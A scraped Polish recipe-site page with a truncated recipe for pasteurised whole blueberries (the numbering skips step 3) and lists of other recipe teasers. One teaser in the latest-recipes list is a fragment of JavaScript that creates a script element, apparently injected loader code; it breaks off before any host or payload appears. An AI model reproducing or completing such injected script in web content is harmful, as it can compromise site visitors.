Jagody całe - pasteryzowane
Źródło: https://smakimoniki.blogspot.com/2016/07/jagody-cae-pasteryzowane.html
Jagody całe - pasteryzowaneSkładniki: {na ok. 14 słoiczków po 180 g}3 litry jagód - to około 2 kilo jagód500 gram cukruPrzygotowanie:1. Jagody przebrać, umyć, odcedzić na sicie.2. Przełożyć do garnka, zasypać cukrem, wymieszać i odstawić na 1 godzinę.4. Przełożyć do małych słoiczków, zakręcić.5. W dużym garnku ułożyć na dnie szmatkę, na niej ułożyć...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 31
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 16
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 23
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 30
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 21
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 16
Przepisy z bloga
SERNIK WIELKANOCNYSkładniki: {16 porcji}CIASTO:2 szklanki... ⇖ 614
TORT KAWOWO AGRESTOWYSkładniki: {15 porcji}SKŁĄDNIKI NA... ⇖ 616
Lato, lato... czekaCycki murzynki Składniki:biszkopt:3... ⇖ 772
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2739
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2099
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1447
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 846
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 679
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 647
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 647









































